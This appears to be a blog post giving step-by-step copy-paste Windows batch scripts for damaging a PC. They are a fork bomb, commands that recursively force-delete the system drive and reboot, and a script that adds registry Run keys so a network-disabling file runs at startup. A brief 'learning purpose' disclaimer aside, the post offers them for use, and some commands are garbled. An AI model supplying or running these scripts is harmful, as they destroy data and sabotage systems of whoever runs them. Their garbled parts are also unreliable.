Simple BAT Script To Crash Windows PC


Here I am providing some simple BAT script which will make your Windows system down/crash.

Note: This is solely for learning purpose. I am not responsible for any harm. Try it at your own risk.

(I)

Below are the steps to create a malfunction script in Windows.

1)Open "Notepad"
2)Copy below code to notepad
%0|%0
3)Save it as "any_name.bat"

4) Try to run it by double click or run as administrator

This will create the garbage data by recursively executing itself forever & you system will slow down & breakdown your system.

(II)

Another simple script in bat for Windows system.

1)Open "Notepad"
2)Copy below code to notepad

@Echo off
Del C:\ *.* |y

3)Save it as "any_name.bat"
4) Try to run it by double click or run as administrator

This will delete your C drive completely

(III)

Another simple but dangerous script in bat for Windows system.

1)Open "Notepad"
2)Copy below code to notepad

@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

Save The Above Code in a .bat file

3)Save it as "any_name.bat"
4) Try to run it by double click or run as administrator


This will delete your system drive completely

(IV)

Another bat script which will disable the internet on your Windows system


1)Open "Notepad"
2)Copy below code to notepad

echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE

3)Save it as "any_name.bat"
4) Try to run it by double click or run as administrator


This will disable your internet in your Windows system completely


Sharing  is Caring 😀



how to crash windows 7 operating system permanently
how to crash windows 10
how to crash windows 7
how to crash windows
how to crash windows 10 using cmd
how to crash windows 10 os
how to crash w0 manually



Post a Comment

0 Comments